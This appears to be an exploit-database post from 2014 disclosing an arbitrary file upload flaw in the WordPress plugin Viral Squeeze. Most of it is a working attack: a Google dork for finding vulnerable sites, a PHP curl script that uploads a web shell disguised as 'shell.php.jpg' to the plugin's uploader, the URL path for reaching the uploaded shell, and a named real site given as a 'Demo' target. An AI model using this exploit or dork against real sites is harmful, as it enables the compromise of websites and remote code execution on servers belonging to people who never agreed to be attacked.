facebook facebook twitter rss

Wordpress Plugin Viral Squeeze Arbitrary File Upload Vulnerability

Author: Aloulou , Published: 11-05-2014
############################################################################
# Title : Wordpress Plugin Viral Squeeze Arbitrary File Upload Vulnerability

# Author : Aloulou

# Date : 11/05/2014

# Facebook : http://www.facebook.com/Aloulou.TN

# Email: aloulou@alquds.com

# Vendor : http://www.viralsqueeze.net/

# Google Dork inurl:”wp-content/plugins/viral-squeeze”

# Tested on : Linux
############################################################################


Exploit: shell.php.jpg or .gif

<?php
$uploadfile
="shell.php.jpg";
$ch curl_init("http://127.0.0.1/wp-content/plugins/viral-squeeze/api/uploader/file-uploader.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'Filedata'=>"@$uploadfile"));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
print 
"$postResult";
?>



ShellAccess:

http://localhost/wp-content/uploads/[year]/[mounth]/shell.php_.jpg

Demo:

http://thegm.co.uk

# Greeting to : Tunisia , CyberPink , Brikovich , Anonboy


############################################################################

Like us on Facebook :